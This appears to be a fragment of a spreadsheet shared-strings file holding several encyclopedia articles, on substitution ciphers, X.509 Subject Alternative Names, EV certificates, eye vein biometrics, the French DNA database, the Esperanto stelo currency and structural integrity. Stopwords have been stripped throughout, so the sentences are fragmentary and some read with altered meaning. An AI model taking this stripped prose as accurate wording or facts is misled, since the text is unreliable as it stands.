    <t>Substitution cipher</t>
  </si>
  <si>
    <t>cryptography, substitution cipher method encrypting units plaintext replaced ciphertext, defined manner, help key; "units" single letters (the common), pairs letters, triplets letters, mixtures above, forth. receiver deciphers text performing inverse substitution process extract original message. substitution ciphers compared transposition ciphers. transposition cipher, units plaintext rearranged different usually quite complex order, units left unchanged. contrast, substitution cipher, units plaintext retained sequence ciphertext, units altered. there number different types substitution cipher. cipher operates single letters, termed simple substitution cipher; cipher operates larger groups letters termed polygraphic. monoalphabetic cipher uses fixed substitution entire message, whereas polyalphabetic cipher uses number substitutions different positions message, unit plaintext mapped several possibilities ciphertext vice versa. simple substitution substitution single letters separately—simple substitution—can demonstrated writing alphabet order represent substitution. this termed substitution alphabet. cipher alphabet shifted reversed (creating caesar atbash ciphers, respectively) scrambled complex fashion, case called mixed alphabet deranged alphabet. traditionally, mixed alphabets created first writing keyword, removing repeated letters writing remaining letters alphabet usual order. using system, keyword "zebras" gives following alphabets: message flee once. discovered! enciphers siaa lkba. rfpbluaoar! usually ciphertext written blocks fixed length, omitting punctuation spaces; done disguise word boundaries plaintext help avoid transmission errors. these blocks called "groups", sometimes "group count" (i.e. number groups) given additional check. five-letter groups often used, dating messages used transmitted telegraph: siaaz qlkba vazoa rfpbl uaoar length message happens divisible five, padded "nulls". these characters decrypt obvious nonsense, receiver easily spot discard them. ciphertext alphabet sometimes different plaintext alphabet; example, pigpen cipher, ciphertext consists symbols derived grid. example: such features make little difference security scheme, however least, strange symbols transcribed back alphabet dealt normal. lists catalogues salespeople, simple encryption sometimes used replace numeric digits letters. example: would used represent 120. security simple substitution ciphers although traditional keyword method creating mixed substitution alphabet simple, serious disadvantage last letters alphabet (which mostly frequency) tend stay end. stronger constructing mixed alphabet generate substitution alphabet completely randomly. although number possible substitution alphabets large (26! 288.4, bits), cipher strong, easily broken. provided message reasonable length (see below), cryptanalyst deduce probable meaning common symbols analyzing frequency distribution ciphertext. this allows formation partial words, tentatively filled progressively expanding (partial) solution (see frequency analysis demonstration this). cases, underlying words also determined pattern letters; example, attract, osseous, words root common english words pattern abbcadb. many people solve ciphers recreation, cryptogram puzzles newspaper. according unicity distance english, 27.6 letters ciphertext required crack mixed alphabet simple substitution. practice, typically letters needed, although messages broken fewer unusual patterns found. cases, plaintext contrived nearly flat frequency distribution, much longer plaintexts required cryptanalyst. nomenclator once-common variant substitution cipher nomenclator. named public official announced titles visiting dignitaries, cipher uses small code sheet containing letter, syllable word substitution tables, sometimes homophonic, typically converted symbols numbers. originally code portion restricted names important people, hence name cipher; later years, covered many common words place names well. symbols whole words (codewords modern parlance) letters (cipher modern parlance) distinguished ciphertext. rossignols' great cipher used louis france one. nomenclators standard fare diplomatic correspondence, espionage, advanced political conspiracy early fifteenth century late eighteenth century; conspirators remained less cryptographically sophisticated. although government intelligence cryptanalysts systematically breaking nomenclators mid-sixteenth century, superior systems available since 1467, usual response cryptanalysis simply make tables larger. late eighteenth century, system beginning out, nomenclators 50,000 symbols.nevertheless, nomenclators broken; today, cryptanalysis archived ciphertexts remains fruitful area historical research. homophonic substitution early attempt increase difficulty frequency analysis attacks substitution ciphers disguise plaintext letter frequencies homophony. ciphers, plaintext letters ciphertext symbol. usually, highest-frequency plaintext symbols given equivalents lower frequency letters. way, frequency distribution flattened, making analysis difficult. since characters required ciphertext alphabet, various solutions employed invent larger alphabets. perhaps simplest numeric substitution 'alphabet'. another method consists simple variations existing alphabet; uppercase, lowercase, upside down, etc. more artistically, though necessarily securely, homophonic ciphers employed wholly invented alphabets fanciful symbols. beale ciphers another example homophonic cipher. this story buried treasure described 1819–21 ciphered text keyed declaration independence. here ciphertext character represented number. number determined taking plaintext character finding word declaration independence started character using numerical position word declaration independence encrypted form letter. since many words declaration independence start letter, encryption character could numbers associated words declaration independence start letter. deciphering encrypted text character (which number) simple looking word declaration independence using first letter word decrypted character. another homophonic cipher described stahl first attempts provide computer security data systems computers encryption. stahl constructed cipher number homophones given character proportion frequency character, thus making frequency analysis much difficult. book cipher straddling checkerboard types homophonic cipher. francesco gonzaga, duke mantua, used earliest known example homophonic substitution cipher 1401 correspondence simone crema. polyalphabetic substitution work al-qalqashandi (1355-1418), based earlier work al-durayhim (1312–1359), contained first published discussion substitution transposition ciphers, well first description polyalphabetic cipher, plaintext letter assigned substitute. polyalphabetic substitution ciphers later described 1467 leone battista alberti form disks. johannes trithemius, book steganographia (ancient greek "hidden writing") introduced standard form tableau (see below; 1500 published much later). sophisticated version using mixed alphabets described 1563 giovanni battista della porta book, furtivis literarum notis (latin concealed characters writing"). polyalphabetic cipher, multiple cipher alphabets used. facilitate encryption, alphabets usually written large table, traditionally called tableau. tableau usually 26×26, full ciphertext alphabets available. method filling tableau, choosing alphabet next, defines particular polyalphabetic cipher. ciphers easier break believed, substitution alphabets repeated sufficiently large plaintexts. popular blaise vigenère. first published 1585, considered unbreakable 1863, indeed commonly called chiffre indéchiffrable (french "indecipherable cipher"). vigenère cipher, first tableau filled copy plaintext alphabet, successive rows simply shifted place left. (such simple tableau called tabula recta, mathematically corresponds adding plaintext letters, modulo 26.) keyword used choose ciphertext alphabet use. each letter keyword used turn, repeated beginning. keyword 'cat', first letter plaintext enciphered alphabet 'c', second 'a', third 't', fourth again, practice, vigenère keys often phrases several words long. 1863, friedrich kasiski published method (probably discovered secretly independently crimean charles babbage) enabled calculation length keyword vigenère ciphered message. once done, ciphertext letters enciphered alphabet could picked attacked separately number semi-independent simple substitutions complicated fact within alphabet letters separated form complete words, simplified fact usually tabula recta employed. such, even today vigenère type cipher theoretically difficult break mixed alphabets used tableau, keyword random, total length ciphertext less 27.67 times length keyword. these requirements rarely understood practice, vigenère enciphered message security usually less might been. other notable polyalphabetics include: gronsfeld cipher. this identical vigenère except alphabets used, "keyword" numerical. beaufort cipher. this practically vigenère, except tabula recta replaced backwards one, mathematically equivalent ciphertext plaintext. this operation self-inverse, whereby table used encryption decryption. autokey cipher, mixes plaintext avoid periodicity. running cipher, made long using passage book similar text.modern stream ciphers also seen, sufficiently abstract perspective, form polyalphabetic cipher effort gone making keystream long unpredictable possible. polygraphic substitution polygraphic substitution cipher, plaintext letters substituted larger groups, instead substituting letters individually. first advantage frequency distribution much flatter individual letters (though actually flat real languages; example, 'th' much common 'xq' english). second, larger number symbols requires correspondingly ciphertext productively analyze letter frequencies. substitute pairs letters would take substitution alphabet symbols long {\displaystyle 26^{2}} furtivis literarum notis mentioned above, della porta actually proposed system, tableau (for letters italian/latin alphabet using) filled unique glyphs. however system impractical probably never actually used. earliest practical digraphic cipher (pairwise substitution), so-called playfair cipher, invented charles wheatstone 1854. cipher, grid filled letters mixed alphabet (two letters, usually combined). digraphic substitution simulated taking pairs letters corners rectangle, using corners ciphertext (see playfair cipher main article diagram). special rules handle double letters pairs falling column. playfair military boer world several practical polygraphics introduced 1901 felix delastelle, including bifid four-square ciphers (both digraphic) trifid cipher (probably first practical trigraphic). hill cipher, invented 1929 lester hill, polygraphic substitution combine much larger groups letters simultaneously using linear algebra. each letter treated digit base variation, extra symbols added make basis prime.) block letters considered vector dimensions, multiplied matrix, modulo components matrix key, random provided matrix invertible {\displaystyle \mathbb _{26}^{n}} ensure decryption possible). mechanical version hill cipher dimension patented 1929.the hill cipher vulnerable known-plaintext attack completely linear, must combined non-linear step defeat attack. combination wider wider weak, linear diffusive steps like hill cipher, non-linear substitution steps, ultimately leads substitution–permutation network (e.g. feistel cipher), possible extreme perspective consider modern block ciphers type polygraphic substitution. mechanical substitution ciphers between around world widespread availability computers (for governments approximately 1950s 1960s; organizations decade later; individuals earlier 1975), mechanical implementations polyalphabetic substitution ciphers widely used. several inventors similar ideas time, rotor cipher machines patented four times 1919. important resulting machines enigma, especially versions used german military approximately 1930. allies also developed used rotor machines (e.g., sigaba typex). similar substituted letter chosen electrically amongst huge number possible combinations resulting rotation several letter disks. since disks rotated mechanically plaintext letter enciphered, number alphabets used astronomical. early versions machine were, nevertheless, breakable. william friedman army's early found vulnerabilities hebern's rotor machine, gc&amp;cs's dillwyn knox solved versions enigma machine (those without "plugboard") well wwii began. traffic protected essentially german military enigmas broken allied cryptanalysts, notably bletchley park, beginning german army variant used early 1930s. this version broken inspired mathematical insight marian rejewski poland. publicly known, messages protected sigaba typex machines ever broken near time systems service. one-time type substitution cipher, one-time pad, unique. invented near world gilbert vernam joseph mauborgne mathematically proven unbreakable claude shannon, probably world work first published late 1940s. common implementation, one-time called substitution cipher unusual perspective; typically, plaintext letter combined (not substituted) manner (e.g., xor) material character position. one-time cases, impractical requires material long plaintext, actually random, used once, kept entirely secret except sender intended receiver. when conditions violated, even marginally, one-time longer unbreakable. soviet one-time messages sent brief time world used non-random material. cryptanalysts, beginning late 40s, able entirely partially, break thousand messages several hundred thousand. (see venona project) mechanical implementation, rather like rockex equipment, one-time used messages sent moscow-washington line established cuban missile crisis. substitution modern cryptography substitution ciphers discussed above, especially older pencil-and-paper hand ciphers, longer serious use. however, cryptographic concept substitution carries even today. from sufficiently abstract perspective, modern bit-oriented block ciphers (e.g., des, aes) viewed substitution ciphers enormously large binary alphabet. addition, block ciphers often include smaller substitution tables called s-boxes. also substitution–permutation network. substitution ciphers popular culture sherlock holmes breaks substitution cipher "the adventure dancing men". there, cipher remained undeciphered years decades; difficulty, suspected code, instead considering childish scribblings. bhed language final fantasy actually substitution cipher, although pronounced phonetically (i.e. "you" english translated "oui" bhed, pronounced "oui" pronounced french). minbari's alphabet babylon series substitution cipher english. language starfox adventures: dinosaur planet spoken native saurians krystal also substitution cipher english alphabet. television program futurama contained substitution cipher letters replaced symbols called "alien language". this deciphered rather quickly hard viewers showing "slurm" word "drink" plain english alien language thus giving key. later, producers created second alien language used combination replacement mathematical ciphers. once english letter alien language deciphered, numerical value letter respectively) added (modulo value previous letter showing actual intended letter. these messages seen throughout every episode series subsequent movies. every season episode cartoon series gravity falls, credit roll, three simple substitution ciphers: caesar cipher (hinted letters back" opening sequence), atbash cipher, letter-to-number simple substitution cipher. season finale encodes message three. second season, vigenère ciphers used place various monoalphabetic ciphers, using hidden within episode. artemis fowl series eoin colfer three substitution ciphers; gnommish, centaurean eternean, along bottom pages somewhere else within books. bitterblue, third novel kristin cashore, substitution ciphers serve important form coded communication. 2013 video game bioshock infinite, substitution ciphers hidden throughout game player must find code books help decipher gain access surplus supplies. anime adaptation devil part-timer!, language ente isla, called entean, uses substitution cipher ciphertext alphabet azyxewvtisrlpnomqkjhugfdcb, leaving original positions. also (unit) centiban table copiale cipher leet vigenère cipher topics cryptography references external links quipqiup automated tool solving simple substitution ciphers without known word boundaries. cryptool exhaustive free open-source e-learning tool perform break substitution ciphers many more. substitution cipher toolkit application amongst things decrypt texts encrypted substitution cipher automatically cipher solver monoalphabetic cipher cracker. monoalphabetic cipher implementation encrypting file language). substitution cipher implementation caesar atbash ciphers (java) online simple substitution implementation (flash) online simple substitution implementation makeprofit code (cgi script: input url, read output page) monoalphabetic substitution breaking monoalphabetic encryption system using known plaintext attack http://cryptoclub.math.uic.edu/substitutioncipher/sub2.htm</t>
  </si>
  <si>
    <t>Subject Alternative Name</t>
  </si>
  <si>
    <t>subject alternative name (san) extension x.509 allows various values associated security certificate using subjectaltname field. these values called subject alternative names (sans). names include: email addresses addresses uris names: usually also provided common name within subject field main certificate. directory names: alternative distinguished names given subject. other names, given general name universal principal name: registered object identifier followed value.rfc 2818 (may 2000) specifies subject alternative names preferred method adding names certificates, deprecating previous method putting names commonname field. google chrome version (march 2017) removed support checking commonname field all, instead looking sans. also wildcard certificate references</t>
  </si>
  <si>
    <t>Extended Validation Certificate</t>
  </si>
  <si>
    <t>extended validation certificate (ev) certificate conforming x.509 proves legal entity owner signed certificate authority issue certificates. certificates used manner x.509 certificates, including securing communications https signing software documents. unlike domain-validated certificates organization-validation certificates, certificates issued subset certificate authorities (cas) require verification requesting entity's legal identity certificate issuance. february 2021, major browsers (google chrome, mozilla firefox, microsoft edge apple safari) menus show status certificate verified legal identity certificates. mobile browsers typically display certificates domain validation (dv) organization validation (ov) certificates. popular websites online, none certificates trend away usage.for software, verified legal identity displayed user operating system (e.g., microsoft windows) proceeding installation. extended validation certificates stored file format specified typically encryption organization-validated certificates domain-validated certificates, compatible server user agent software. criteria issuing certificates defined guidelines extended validation established ca/browser forum.to issue extended validation certificate, requires verification requesting entity's identity operational status control domain name hosting server. history introduction ca/browser forum 2005 melih abdulhayoglu, comodo group (currently known xcitium), convened first meeting organization became ca/browser forum, hoping improve standards issuing ssl/tls certificates. june 2007, ca/browser forum officially ratified first version extended validation (ev) guidelines, took effect immediately. formal approval successfully brought close years effort provided infrastructure trusted website identity internet. then, april 2008, forum announced version guidelines, building practical experience member relying-party application software suppliers gained months since first version approved use. creation special indicators browsers most major browsers created special user interface indicators pages loaded https secured certificate soon creation standard. this includes google chrome 1.0, internet explorer 7.0, firefox safari 3.2, opera 9.5. furthermore, mobile browsers, including safari ios, windows phone, firefox android, chrome android, ios, added indicators. usually, browsers support display validated identity—usually combination organization name jurisdiction—contained certificate's 'subject' field. implementations, enhanced display includes: name company entity owns certificate; lock symbol, also address bar, varies color depending security status website.by clicking lock symbol, user obtain information certificate, including name certificate authority issued certificate. removal special indicators 2018, google announced plans redesign user interfaces google chrome remove emphasis certificates. chrome released 2019, removed certificate indication omnibox, certificate status viewed clicking lock icon checking legal entity name "certificate". firefox removed distinction omnibox certificates displayed similarly lock icon), details certificate status accessible detailed view opens click lock icon.apple safari macos mojave (released september 2018) removed visual distinction status. issuing criteria only pass independent qualified audit review offer globally must follow detailed issuance requirements establish legal identity well operational physical presence website owner; establish applicant domain name owner exclusive control domain name; confirm identity authority individuals acting website owner, documents pertaining legal obligations signed authorized officer; limit duration certificate validity ensure certificate information date. ca/b forum also limiting maximum re-use domain validation data organization data maximum days (must exceed days) march 2020 onward.with exception extended validation certificates .onion domains, otherwise possible wildcard extended validation certificate instead, fully qualified domain names must included certificate inspected certificate authority. extended validation certificate identification certificates standard x.509 digital certificates. primary identify certificate referencing certificate policies extension field. each issuer uses different object identifier (oid) field identify certificates, documented issuer's certification practice statement. root certificate authorities general, browsers recognize issuers. https certificates contain subject x.509 oids jurisdictionofincorporationcountryname (oid: 1.3.6.1.4.1.311.60.2.1.3), jurisdictionofincorporationstateorprovincename (oid: 1.3.6.1.4.1.311.60.2.1.2) (optional),jurisdictionlocalityname (oid: 1.3.6.1.4.1.311.60.2.1.1) (optional), businesscategory (oid: 2.5.4.15) serialnumber (oid: 2.5.4.5), serialnumber pointing relevant secretary state (us) government business registrar (outside us), well ca-specific policy identifier ev-aware software, browser, recognize them. this identifier defines certificate difference certificate. online certificate status protocol criteria issuing extended validation certificates require issuing certificate authorities immediately support online certificate status protocol revocation checking. however, requirement timely response revocation checks browser prompted certificate authorities previously done implement ocsp support. section 26-a issuing criteria requires support ocsp checking certificates issued dec. 2010. criticism colliding entity names legal entity names unique, therefore attacker wants impersonate entity might incorporate different business name (but, e.g., different state country) obtain valid certificate certificate impersonate original site. demonstration, researcher incorporated business called "stripe, inc." kentucky showed browsers display similarly display certificate payment processor "stripe, inc." incorporated delaware. researcher claimed demonstration setup took hour time, us$100 legal costs us$77 certificate. also, noted "with enough mouse clicks, [user] able [view] city state [where entity incorporated], neither helpful typical user, likely blindly trust certificate] indicator". availability small businesses since certificates promoted reported mark trustworthy website, small business owners voiced concerns certificates give undue advantage large businesses. published drafts guidelines excluded unincorporated business entities, early media reports focused issue. version guidelines revised embrace unincorporated associations long registered recognized agency, greatly expanding number organizations qualified extended validation certificate. effectiveness phishing attacks security 2006, researchers stanford university microsoft research conducted usability study display internet explorer their paper concluded "participants received training browser security features notice extended validation indicator outperform control group", whereas "participants asked read internet explorer help file likely classify real fake sites legitimate". domain-validated certificates created first place while proponents certificates claim help phishing attacks, security expert peter gutmann states class certificates restore ca's profits eroded race bottom occurred among issuers industry. according peter gutmann, certificates effective phishing certificates "not fixing problem phishers exploiting". suggests commercial introduced certificates return high prices. also qualified website authentication certificate http strict transport security references external links ca/browser forum site firefox green padlock certificates</t>
  </si>
  <si>
    <t>Eye vein verification</t>
  </si>
  <si>
    <t>vein verification method biometric authentication applies pattern-recognition techniques video images veins user's eyes. complex random patterns unique, modern hardware software detect differentiate patterns distance eyes. introduction veins sclera—the white part eyes—can imaged person glances either side, providing four regions patterns: side eye. verification employs digital templates patterns, templates encoded mathematical statistical algorithms. these allow confirmation identity proper user rejection anyone else. advocates vein verification note technology's strengths stability pattern blood vessels; patterns change age, alcohol consumption, allergies, redness. veins clear enough reliably imaged cameras smartphones. technology works contacts glasses, though sunglasses. least version vein detection uses infrared illumination part imaging, allowing imaging even low-light conditions. history reza derakhshani university missouri, kansas city, developed concept using veins whites eyes identification. holds several patents technology, including 2008 patent concept using blood vessels seen whites unique identifier. more recent research explored using vein patterns iris sclera recognition. uses vein verification, like methods biometric authentication, used range security situations, including mobile banking, government security, healthcare environments.eyeverify, kansas city, kansas, company, markets vein verification system called eyeprint. 2012, eyeverify licensed technology developed patented derakhshani. derakhshani serves chief science officer eyeverify. advantages vein patterns unique person patterns change time still readable redness works contacts glasses resistant false matches disadvantages phone must held close face supported devices without cameras older smartphones also references</t>
  </si>
  <si>
    <t>FNAEG</t>
  </si>
  <si>
    <t>fichier national automatisé empreintes génétiques (english: automated national file genetic prints) french national database, used national police force local gendarmerie. origins evolution june 1998, guigou prevention sexually-related crimes, passed plural left lionel jospin government, created national database. implementation, originally planned 1999, finally completed 2001, database located écully rhône, managed subdirectorate technical scientific departments french police force. aftermath september attacks 2001, french government increased scope database include related serious criminal offences, voluntary manslaughter, criminal violence terrorism. 'law interior safety' introduced march 2003 expanded scope still cover almost violent crimes people property, serious crimes drug trafficking, simple thefts, tags dégradations, finally almost small offenses, traffic offenses crimes committed abroad. samples taken convicted persons also simple suspects. specify minimum age.in september 2009, matthieu bonduelle, general secretary syndicat magistrature (the first syndicat juges) declared "nobody defends universal database, but, fact, done." relative size october 2003, fnaeg understood contain records approximately 8,000 convicted criminals another 3,200 suspects. 2006, number believed excess 330,000 entries. 2007, number believed excess nearly 500,000 entries december 2009, 1.27 million entries. privacy concerns with expansion database 2003, also became offence suspects fail provide sample, punishment ranging prison sentence months years, fine €7500 €30000. 2006, media raised case individuals refusing provide samples. many civil disobedience activists opposed genetically modified organism (gmo) (see fr:faucheurs volontaires). although around cases, denounced regarded threat personal freedom. also government database references external links fichier national automatisé empreintes génétiques official website french ministère l’intérieur fichier national automatisé empreintes génétiques</t>
  </si>
  <si>
    <t>Stelo</t>
  </si>
  <si>
    <t>stelo ("star"; plural: steloj) 1945 1993 monetary unit esperantists, whose aims achieve single world currency. attempts earlier currency, speso, short first world war. time universal league (esperanto: universala ligo), part esperanto movement, issued coupons coins denominated steloj, making attempts link stelo existing currencies basis relative purchasing power different countries. currency name used esperanto youth meetings 2012 present day. plastic coins several colors. speso esperantists concerned international relationships, need currency fixed purchasing power important. commemorate 25th anniversary esperanto 1912, swiss firm holy frères made coins universal esperanto association speso (plural: spesoj) denominations spesdeko spesoj), spescento (100 spesoj), spesmilo (1,000 spesoj) spesdekmilo (10,000 spesoj). first world war, however, initiative. founding universal league april 1942, 25th anniversary death zamenhof, group faithful esperantists gathered secret private residence hague remember him. netherlands nazi occupation group already experienced tyranny police state. esperantists among groups especially persecuted even exterminated nazis, wanted jointly undertake concrete task help save mankind "world catastrophe." after discussion, esperantists agreed form universal league organization whose principal purpose would implement zamenhof's original program: unite humanity peace common language. employing motto "one world, language, currency," netherlands-based group promoted stelo universal currency unit. with founding universal league, express wish now-deceased zamenhof esperantists many different lands second world coming fruition. original participants secretly invited well-known esperantists take part discussions. preparatory committee constituted develop ideas further. april 1945 committee revealed basic concept world. stated purposes was: strive creation world currency, based international monetary unit, stelo." march 1946 first international assembly held hague. 1294 members meeting approved constitution, stated goals issuing stelo currency stable, internationally agreed value. members elected committee work details stelo. contribution lifelong membership first "cornerstone" value stelo. soon, however, announced value stelo would equal price standard loaf bread netherlands, time cost 0.25 dutch guilders. 1946 assembly re-emphasized motto "one world, language, currency." league commercial relations banks countries (belgium, denmark, germany, italy, sweden switzerland), well three dutch banks. bank accounts universal league maintained parallel systematic accounting local currency steloj, appointed agents countries. these representatives submitted financial operations reports basis stelo. monetary stability archives universal league show intention mint coin fixed value. league stability lift world pressures economic differentials tended result conflicts among peoples. exchange rates stelo outside netherlands based 1946 exchange rates currencies quoted largest dutch commercial bank. coupons first esperantists forgo steps, establishment bank worldwide cheque endorsing payment system issuing coins banknotes. time various nations strict rules governing international financial operations designed shield outside financial attack. even early period (1945) universal league nevertheless brought 1-stelo premio-kupono, remained valid till 1950. every coupon issue brought market intended valid five years. coupons used subscriptions, advertisements, activity participation costs, etc. league members also received coupons rewards introducing members competition prizes. according report praktiko premio-kupono flourished, became habitual esperantists them, example esperanto world conferences. later development stelo stagnated. universal league founders wanted show good maintaining constant value stelo, efforts doomed failure. dutch price bread gradually increased, nobody thought adjust relationship stelo guilder. ratio remained four steloj guilder, bank currency conversion tables used value stelo countries. moreover, even universal league gave idea recording bookkeeping transactions stelo monetary units, nobody gained experience coin constant value. wonder stelo lost reputation even esperantists became rare. minting coinage during 1950s membership universal league grew 15,000 esperantists. 1959, realized longstanding dream minting esperanto coinage denominations stelo (bronze), five steloj (yellow copper) steloj (cupronickel). rich worldwide commodity sales receipts, universal league placed large order royal dutch mint (rijksmunt) utrecht strike coinage. this investment swiftly recouped, result 1965 league able issue fourth denomination, silver steloj coin, also sold well. cupronickel gold variants steloj denomination also minted. dream stelo retaining constant value almost forgotten except among universal league members. league fell quiet scarcely anything, though still publishing illustrated magazine praktiko. subtitle journal citizens world; previously journal instruction recreation. publication periodical stopped 1970, andreo cseh, editor since 1946, retire weak health. cseh remained care home death 1979. list coins: lawrence mee's role lawrence breathe life universal league. 1973 wife became co-workers head office world esperanto organization. following year universal league selected faithful members lead renewal league striving peace cooperation world association world federation (now known world federalist movement) world esperanto association. years promoted development stelo international currency. after long discussion concluded stelo revalued fourth guilder half-guilder. further discussions universal league value stelo. later write significant comprehensive essay development stelo, stabiele munteenheid esperantisten: stelo" archived september 2015 wayback machine ("the stable monetary unit esperantists: stelo'"), first appeared 2000 yearbook europees genootschap voor munt- penningkunde, federation dutch-language numismatic associations. fixed value setting fixed value stelo meant that, certain date, purchasing power would thereafter remain would subject inflation. chosen date, january 1977, purchasing power stelo defined equal half guilder; i.e., guilder equal steloj. josef hartl vienna devised detailed plan fixing value stelo. around 1977 hartl circulated pamphlet stelo appears influenced lawrence mee. hartl's article suggested circulation currency constant value answer inflationary devaluation. basic idea regardless level development country could calculate national currency average family's monthly expenditure. could arbitrarily assign value 1,000 monetary units average monthly expenditure. thus definition, loss family country say, units would absolutely equal "international monetary units." careful calculation, therefore, conversion rate international monetary unit national currency could adjusted necessary according inflation rate particular country. basing transactions among different countries international monetary unit, national currencies would beyond attacks speculators; indeed, speculation currency values would become useless. often occurs, several unconnected events happened coincide: 1976 internacia scienca asocio esperantista (isae: international esperanto sciences association) urged universal league revalue stelo; members took leading role league; league forgotten supply stelo coins rediscovered; time publication magazine began; dutch monetary reformer published article concerning unsuitability currency systems industrialized lands; hartl launched pamphlet. treasurer league lawrence enthusiastically accepted position league treasurer 1977. remaining board members christiaan m.n.t. roodt willem roelofs, eager quickly establish procedure keep stelo's value constant publish result within framework esperanto movement. under editorship roodt, universal league's periodical bulteno guided idea value stelo would remain constant, unaffected inflation. with bank accounts seven countries including netherlands, universal league needed stipulate value stelo countries. want scientific data effective purchasing power various national currencies was, however, impossible determine reliable conversion rates stelo national currency. while conversion rate guilder solidly established, agreement rates would easy. roelofs especially wanted give stelo character totally different hartl's idea international monetary units. also advocated using stelo propaganda money reform. roelofs believed stelo serve basis international financial transactions, countries refused deal commercial banks. system would function never detailed paper, writes lawrence mee, "presumably ideas money reformers already well known." although admitted original basis purchasing-power provision somewhat arbitrary, wanted stelo serve role originally envisioned universal league. even months discussions, possible fashion compromise views, majority league's governing board supported roelofs's views. could accept decision resigned league. from time time roelofs supplied bulteno tables stelo's current value never disclosed principles calculation method. could work underlying value ratios used, although assumed archived. unofficial stelo lawrence ideas hartl dead. wife long used stelo bookkeeping business mondkomercista eldonejo esperantista esperanto-language trade publisher). after departure universal league tried apply roelofs's currency values, quickly concluded data purchasing power stelo erroneous. from mid-1980s began collect statistical data inflation various countries, gaining unexpected support economics instructor erasmus university rotterdam. instructor great interest mee's work. honorary member library erasmus university, occupied much free time researching statistical data countries organisation economic co-operation development. worked unofficial value stelo countries, using point departure january 1977, stelo's fixed purchasing power defined. discovered universal league formula certainly wrong netherlands; presumed wrong countries also, although proof this. progress mee's research accelerated 1981 began distributing tables nine countries' currency relationships, could make rapid trustworthy calculations. shortly became apparent, however, italian data sufficiently dependable make reliable inferences country's currency values. basic calculating system adapted could obtain regular reliable data, could currency relationships among many countries. believed, however, even incomplete data great utility. currency relationships permitted determine purchasing power stelo express national currency certain country. able stelo service everywhere would require joint work multinational network collaborators. lawrence continued. matters went still rapidly purchased computer, current norms would considered primitive. already possible september 1992 rapidly calculate currency value predictions different countries. since booklet title informkajero stelo (notes stelo) published distributed enthusiastic collaborators, especially esperantocentrum aarhus, denmark. beginning study stelo's purchasing power, associates already noted purchasing power great britain determined arbitrarily: january 1977, example, according large banks' currency agreements pound equal 4.1875 guilder. because guilder defined equal steloj followed pound would equal 8.375 steloj. this exchange rate would remain reliable method could devised directly compare purchasing power countries other. also applied system countries. lawrence already reported arbitrary decision fixing basic purchasing power stelo countries outside netherlands. accounting basis applied arbitrary decisions, time goal presenting acceptable currency rates. those decisions formed system employed regularly calculate publish currency conversion rates. utility stelo since stelo currency esperantists, good example utility publication monthly magazine payment rents salaries. publisher monthly magazine receives subscription money, requires services printer, must stationery postage, etc. under influence inflation costs tend increase time proportion inflation rate. eventually publisher must contemplate increase annual subscription rate. annual rate usually announced september next calendar year. associates could show linking subscription rate stable currency unit facilitated task, although commercial bank rates still required separate consideration. particular publisher 1977 satisfied exchange-value steloj year, mee's studies concerning stelo predicted exchange value steloj would continue sufficient future years. that publisher, therefore, would need currency tables september idea required subscription price level national currencies next year. second example practice esperantists rental hall another society. esperanto association would want maintain purchasing power rental revenue (since association's expenses would likely increase inflation time) could conclude agreement tenant, expressed steloj payable national currency according then-current monthly conversion rate. third example determination salary work performed. whether reckon using stelo system not, wages matter daily concern. industrialized countries must contend inflation, continuously gnaws away family budget, remedy continuing increase salaries. especially industrialized world, wage negotiations lead sometimes bitter confrontation employers labour unions. developing countries lacking strong tradition labour relations law, confrontations result human rights abuses even police military intervention. after strike lockout concluded take long time regain atmosphere mutual confidence trust. esperantist economists believe application stelo labour-management negotiations could prevent problems. dissolution universal league universal league remained existence, esperanto world significance declined. after placed obituary periodical esperanto, many colleagues died well. roelofs taken editing bulteno roodt could longer undertake irregular appearance issues bulteno made apparent reduction active league membership. 1993 governing board universal league ceased publishing bulteno decided wind affairs league itself. remaining capital divided among several foundations, funds going world esperanto association. among grants found stock stelo coins sold collector's items. death roodt 1996 roelofs 1998 marked major esperantist initiative. esperanto coin steloj 2018 silver anniversary rené saussure (150th birthday), 1868–1943. 31,1 silver 999/1000. esperanto coins stamps belgium 1982 esperanto postage stamp face value belgian francs issued. several dozen countries also issued stamps, especially 1987 100th anniversary publication zamenhof unua libro. cuba 1990 occasion world esperanto congress havana, cuba, 1-peso coin esperanto text minted. croatia 1997 25-kuna coin esperanto text minted. bibliography dutch: stabiele munteenheid esperantisten: stelo" archived september 2015 wayback machine, 2000 yearbook europees genootschap voor munt- penningkunde boegheim, "esperanto-betaalpenningen" muntkoerier, 3-1994, 27–33 english: "esperanto dream world currency" references</t>
  </si>
  <si>
    <t>Structural integrity and failure</t>
  </si>
  <si>
    <t>structural integrity failure aspect engineering deals ability structure support designed structural load (weight, force, etc.) without breaking includes study past structural failures order prevent failures future designs. structural integrity ability item—either structural component structure consisting many components—to hold together load, including weight, without breaking deforming excessively. assures construction perform designed function reasonable use, long intended life span. items constructed structural integrity prevent catastrophic failure, result injuries, severe damage, death, and/or monetary losses. structural failure refers loss structural integrity, loss load-carrying capacity either structural component structure itself. structural failure initiated material stressed beyond strength limit, causing fracture excessive deformations; limit state must accounted structural design ultimate failure strength. well designed system, localized failure cause immediate even progressive collapse entire structure. introduction structural integrity ability structure withstand intended loading without failing fracture, deformation, fatigue. concept often used engineering produce items serve designed purposes remain functional desired service life. construct item structural integrity, engineer must first consider material's mechanical properties, toughness, strength, weight, hardness, elasticity, determine size shape necessary material withstand desired load long life. since members neither break bend excessively, must stiff tough. stiff material resist bending, unless sufficiently tough, large support load without breaking. hand, highly elastic material bend load even high toughness prevents fracture. furthermore, component's integrity must correspond individual application load-bearing structure. bridge supports need high yield strength, whereas bolts hold need good shear tensile strength. springs need good elasticity, lathe tooling needs high rigidity. addition, entire structure must able support load without weakest links failing, stress structural elements lead cascading failures. history need build structures integrity goes back recorded history. houses needed able support weight, plus weight inhabitants. castles needed fortified withstand assaults invaders. tools needed strong tough enough jobs. however, science fracture mechanics exists today developed 1920s, alan arnold griffith studied brittle fracture glass. starting 1940s, infamous failures several technologies made scientific method analyzing structural failures necessary. during world welded-steel ships broke half brittle fracture, caused stresses created welding process, temperature changes, stress concentrations square corners bulkheads. 1950s, several havilland comets exploded mid-flight stress concentrations corners squared windows, caused cracks form pressurized cabins explode. boiler explosions, caused failures pressurized boiler tanks, another common problem era, caused severe damage. growing sizes bridges buildings even greater catastrophes loss life. this need build constructions structural integrity great advances fields material sciences fracture mechanics. types failure structural failure occur many types problems, unique different industries structural types. however, traced five main causes. first structure strong tough enough support load, either size, shape, choice material. structure component strong enough, catastrophic failure occur structure stressed beyond critical stress level. second type failure fatigue corrosion, caused instability structure's geometry, design material 